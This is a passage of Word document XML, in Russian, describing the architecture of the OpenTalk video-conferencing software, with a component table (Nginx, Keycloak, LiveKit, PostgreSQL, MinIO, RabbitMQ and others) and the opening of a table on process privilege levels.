          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">веб-браузер, аутентификация реализована отдельным контейнером </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F04CB">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F04CB" w:rsidRPr="001F04CB">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00267D35" w:rsidRPr="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00267D35">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">работающая по протоколу </w:t>
      </w:r>
      <w:r w:rsidR="00267D35">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>OIDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C15123" w14:textId="7334EB0C" w:rsidR="0013130E" w:rsidRPr="001074BB" w:rsidRDefault="0030172E" w:rsidP="0013130E">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk229508467"/>
      <w:r w:rsidRPr="0030172E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="485DE6C4" wp14:editId="20F19549">
            <wp:extent cx="5748528" cy="4762029"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635"/>
            <wp:docPr id="4095863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767" cy="476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73DD" w14:textId="087D0598" w:rsidR="0013130E" w:rsidRPr="0030172E" w:rsidRDefault="0030172E" w:rsidP="0013130E">
      <w:pPr>
        <w:pStyle w:val="18"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Ref234277735"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="0013130E" w:rsidRPr="0030172E">
        <w:t xml:space="preserve"> Схема архитектуры ПО</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidR="003A5828">
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A5828">
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208F406C" w14:textId="7B008A12" w:rsidR="0013130E" w:rsidRPr="00495F80" w:rsidRDefault="0013130E" w:rsidP="0013130E"/>
    <w:p w14:paraId="291B07B9" w14:textId="581CFF66" w:rsidR="001074BB" w:rsidRDefault="001074BB" w:rsidP="001074BB">
      <w:pPr>
        <w:pStyle w:val="19"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Ref234278114"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="005A210B">
        <w:t>Функциональные компоненты ПО</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="003A5828">
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A5828">
        <w:t>»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1129"/>
        <w:gridCol w:w="3546"/>
        <w:gridCol w:w="2338"/>
        <w:gridCol w:w="2338"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E04855" w14:paraId="29AB4468" w14:textId="77777777" w:rsidTr="00C804D5">
        <w:trPr>
          <w:tblHeader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DD95F" w14:textId="77777777" w:rsidR="00E04855" w:rsidRPr="00C82B97" w:rsidRDefault="00E04855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№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8E0DD" w14:textId="77777777" w:rsidR="00E04855" w:rsidRPr="00C82B97" w:rsidRDefault="00E04855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Название компонента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75679" w14:textId="77777777" w:rsidR="00E04855" w:rsidRPr="00C82B97" w:rsidRDefault="00E04855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Технологический стек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D5823" w14:textId="77777777" w:rsidR="00E04855" w:rsidRPr="00C82B97" w:rsidRDefault="00E04855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Функционал компонента</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED7EE4" w14:paraId="475EBF7F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7995" w14:textId="40CE674B" w:rsidR="00ED7EE4" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>1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1EED" w14:textId="35B25A90" w:rsidR="00ED7EE4" w:rsidRDefault="003A5828" w:rsidP="00ED7EE4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Nginx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F1CC1" w14:textId="0F8B5C86" w:rsidR="00ED7EE4" w:rsidRDefault="003A5828" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nginx</w:t>
            </w:r>
            <w:r w:rsidR="00ED7EE4" w:rsidRPr="00ED7EE4">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/1.28.3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C380" w14:textId="46329149" w:rsidR="00ED7EE4" w:rsidRPr="00ED7EE4" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Обратный прокси-сервер, точка входа с систему, маршрутизирует запросы к сервисам, защита и </w:t>
            </w:r>
            <w:r w:rsidR="008D0061">
              <w:t>конфиденциальность архитектуры</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED7EE4" w14:paraId="5ACB078A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DBAD" w14:textId="4435F732" w:rsidR="00ED7EE4" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>2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37F1" w14:textId="45DEFAEF" w:rsidR="00ED7EE4" w:rsidRPr="0013130E" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1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Opentalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-web-frontend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9E5F4" w14:textId="4D280EA8" w:rsidR="00ED7EE4" w:rsidRPr="00554AC2" w:rsidRDefault="00554AC2" w:rsidP="00ED7EE4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React, TS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8D78" w14:textId="5E89E543" w:rsidR="00ED7EE4" w:rsidRPr="00554AC2" w:rsidRDefault="00554AC2" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Фронтенд приложения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED7EE4" w14:paraId="470C6306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7B48" w14:textId="077A8C08" w:rsidR="00ED7EE4" w:rsidRPr="0013130E" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4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4761" w14:textId="28A305F9" w:rsidR="00ED7EE4" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1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Opentalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">-Controller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465C" w14:textId="7E8EA211" w:rsidR="00ED7EE4" w:rsidRPr="00554AC2" w:rsidRDefault="00554AC2" w:rsidP="00ED7EE4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Rust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DD1D" w14:textId="6EB5A9AD" w:rsidR="00ED7EE4" w:rsidRPr="00554AC2" w:rsidRDefault="00554AC2" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ядро ПО, </w:t>
            </w:r>
            <w:r w:rsidR="003A5828">
              <w:t>обработка</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> запросов от фронтенд </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Rest</w:t>
            </w:r>
            <w:r w:rsidRPr="00554AC2">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>работа с правами, комнатами, координация контейнеров</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED7EE4" w:rsidRPr="003A5828" w14:paraId="04CEAAC9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BC70" w14:textId="69086DEA" w:rsidR="00ED7EE4" w:rsidRPr="0013130E" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4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6E22B" w14:textId="244E2E5C" w:rsidR="00ED7EE4" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="112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Opentalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">» 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380E" w14:textId="65D7B536" w:rsidR="00ED7EE4" w:rsidRPr="00936672" w:rsidRDefault="00936672" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Java</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>OIDC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D8526" w14:textId="77777777" w:rsidR="00ED7EE4" w:rsidRDefault="00936672" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Управление идентификацией и доступом, </w:t>
            </w:r>
            <w:r w:rsidRPr="00936672">
              <w:t>управлени</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">е </w:t>
            </w:r>
            <w:r w:rsidRPr="00936672">
              <w:t>пользователями</w:t>
            </w:r>
            <w:r>
              <w:t>, сторонняя система интегрированная в ПО</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42063FE9" w14:textId="7815D7E6" w:rsidR="009A6C8D" w:rsidRPr="003A5828" w:rsidRDefault="009A6C8D" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>https</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5828">
              <w:t>://</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>github</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A5828">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>com</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5828">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F04CB" w:rsidRPr="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A5828">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F04CB" w:rsidRPr="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED7EE4" w:rsidRPr="009A6C8D" w14:paraId="58D34349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E0D3" w14:textId="3BC93D15" w:rsidR="00ED7EE4" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4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DFAF" w14:textId="5D6DA2EC" w:rsidR="00ED7EE4" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1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Opentalk-</w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LiveKit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1F1A" w14:textId="7943954A" w:rsidR="00ED7EE4" w:rsidRPr="009A6C8D" w:rsidRDefault="009A6C8D" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Go, WebRTC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19A6" w14:textId="3D640366" w:rsidR="009A6C8D" w:rsidRPr="009A6C8D" w:rsidRDefault="009A6C8D" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Контейнер </w:t>
            </w:r>
            <w:r w:rsidRPr="009A6C8D">
              <w:t>многопользовательск</w:t>
            </w:r>
            <w:r>
              <w:t>ий</w:t>
            </w:r>
            <w:r w:rsidRPr="009A6C8D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003A5828" w:rsidRPr="009A6C8D">
              <w:t>конференцсвязи</w:t>
            </w:r>
            <w:r w:rsidRPr="009A6C8D">
              <w:t xml:space="preserve"> на основе </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A6C8D">
              <w:t>WebRTC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A6C8D">
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> П</w:t>
            </w:r>
            <w:r w:rsidRPr="009A6C8D">
              <w:t>ередач</w:t>
            </w:r>
            <w:r>
              <w:t>а</w:t>
            </w:r>
            <w:r w:rsidRPr="009A6C8D">
              <w:t xml:space="preserve"> видео- и аудиоданных в реальном времени</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56962340" w14:textId="43337947" w:rsidR="00ED7EE4" w:rsidRPr="009A6C8D" w:rsidRDefault="009A6C8D" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="009A6C8D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>https</w:t>
            </w:r>
            <w:r w:rsidRPr="009A6C8D">
              <w:t>://</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A6C8D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>github</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A6C8D">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="009A6C8D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>com</w:t>
            </w:r>
            <w:r w:rsidRPr="009A6C8D">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LiveKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A6C8D">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LiveKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED7EE4" w14:paraId="392647DB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5C43" w14:textId="77FB9F73" w:rsidR="00ED7EE4" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4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3CB3" w14:textId="192D3213" w:rsidR="00ED7EE4" w:rsidRDefault="00ED7EE4" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1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Opentalk-postgres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6801" w14:textId="4C493AEC" w:rsidR="00ED7EE4" w:rsidRPr="009A6C8D" w:rsidRDefault="009A6C8D" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A6C8D">
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A6C8D">
              <w:t xml:space="preserve"> 17.7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AEB6B" w14:textId="152463A8" w:rsidR="00ED7EE4" w:rsidRPr="004001BF" w:rsidRDefault="004001BF" w:rsidP="00ED7EE4">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">База данных контейнера </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004001BF" w14:paraId="2C99230C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E5D6" w14:textId="25628839" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF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0521" w14:textId="09318DB0" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1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Opentalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-kc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79A47" w14:textId="1B75DE59" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A6C8D">
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A6C8D">
              <w:t xml:space="preserve"> 17.7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F75B" w14:textId="09DD8D22" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>База данных</w:t>
            </w:r>
            <w:r w:rsidR="003A5828">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A68716" w14:textId="28897AA7" w:rsidR="004001BF" w:rsidRPr="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004001BF" w14:paraId="49D5AD34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07F69" w14:textId="5010AE80" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF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C0A1" w14:textId="68233BB0" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1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Opentalk-minio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EA007" w14:textId="04F62566" w:rsidR="004001BF" w:rsidRPr="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF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Go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D448" w14:textId="2C3E5C2B" w:rsidR="004001BF" w:rsidRPr="00A16CC7" w:rsidRDefault="004001BF" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Объектное хранилище </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OpenTalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00A16CC7">
              <w:t xml:space="preserve"> хранит </w:t>
            </w:r>
            <w:r w:rsidR="00A16CC7" w:rsidRPr="00A16CC7">
              <w:t>записи конференций</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DDE0794" w14:textId="6F62A51A" w:rsidR="004001BF" w:rsidRPr="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="004001BF">
              <w:t>Доступ по протоколу S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004001BF" w14:paraId="513ADC53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9A2A" w14:textId="2B033C64" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF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0D35" w14:textId="1A033B88" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1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Opentalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Rabbit</w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MQ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7CD4" w14:textId="211F2EFB" w:rsidR="004001BF" w:rsidRPr="001074BB" w:rsidRDefault="001074BB" w:rsidP="004001BF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JavaScript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8AEF" w14:textId="2D812CF6" w:rsidR="004001BF" w:rsidRDefault="003A5828" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Агент </w:t>
            </w:r>
            <w:r w:rsidR="00500E85" w:rsidRPr="00500E85">
              <w:t>сообщений. Очереди задач для рассылки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004001BF" w14:paraId="66E20DC7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27148" w14:textId="0328F907" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF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9B44" w14:textId="540970BC" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1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Opentalk-redis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15DD0" w14:textId="60982F92" w:rsidR="004001BF" w:rsidRPr="001074BB" w:rsidRDefault="001074BB" w:rsidP="004001BF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D3CB" w14:textId="47641EE0" w:rsidR="004001BF" w:rsidRPr="00500E85" w:rsidRDefault="003A5828" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Х</w:t>
            </w:r>
            <w:r w:rsidR="00500E85" w:rsidRPr="00500E85">
              <w:t xml:space="preserve">ранилище для синхронизации между экземплярами </w:t>
            </w:r>
            <w:r w:rsidR="00500E85" w:rsidRPr="00500E85">
              <w:lastRenderedPageBreak/>
              <w:t>контроллера.</w:t>
            </w:r>
            <w:r w:rsidR="00500E85" w:rsidRPr="00500E85">
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00500E85" w:rsidRPr="00500E85">
              <w:t>Не задействован в текущей</w:t>
            </w:r>
            <w:r w:rsidR="00500E85">
              <w:t xml:space="preserve"> реализации</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004001BF" w14:paraId="2B38055A" w14:textId="77777777" w:rsidTr="00D115EC">
        <w:trPr>
          <w:trHeight w:val="83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B190" w14:textId="20725B8F" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF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lastRenderedPageBreak/>
              <w:t>11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8F8B" w14:textId="6B66EC11" w:rsidR="004001BF" w:rsidRDefault="004001BF" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1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Opentalk-autoheal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A41C" w14:textId="6A6038B0" w:rsidR="004001BF" w:rsidRPr="001074BB" w:rsidRDefault="001074BB" w:rsidP="004001BF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Docker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8D22" w14:textId="662DAD76" w:rsidR="004001BF" w:rsidRPr="00500E85" w:rsidRDefault="00A16CC7" w:rsidP="004001BF">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A16CC7">
              <w:t>Отслеживает состояние контейнеров</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C192EA3" w14:textId="62EA9F33" w:rsidR="001911AD" w:rsidRDefault="001911AD" w:rsidP="001911AD">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E31A99" w14:textId="644A775B" w:rsidR="005927B6" w:rsidRPr="005927B6" w:rsidRDefault="00C54DEE" w:rsidP="001911AD">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54DEE">
        <w:t xml:space="preserve">Ниже приведены сведения об уровне привилегий процессов и служб ПО </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C54DEE">
        <w:t xml:space="preserve">, полученные при локальном доступе к серверу. Результаты представлены в </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref234291141 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003A5828">
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>таблице</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4174539F" w14:textId="1CC35C12" w:rsidR="005E340B" w:rsidRPr="00623E39" w:rsidRDefault="005E340B" w:rsidP="005E340B">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Ref234291141"/>
      <w:r w:rsidRPr="00623E39">
        <w:t xml:space="preserve">– Процессы и службы ПО </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:proofErr w:type="spellEnd"/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1129"/>
        <w:gridCol w:w="3119"/>
        <w:gridCol w:w="2693"/>
        <w:gridCol w:w="2410"/>
      </w:tblGrid>
      <w:tr w:rsidR="005E340B" w14:paraId="1596886A" w14:textId="77777777" w:rsidTr="00D115EC">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
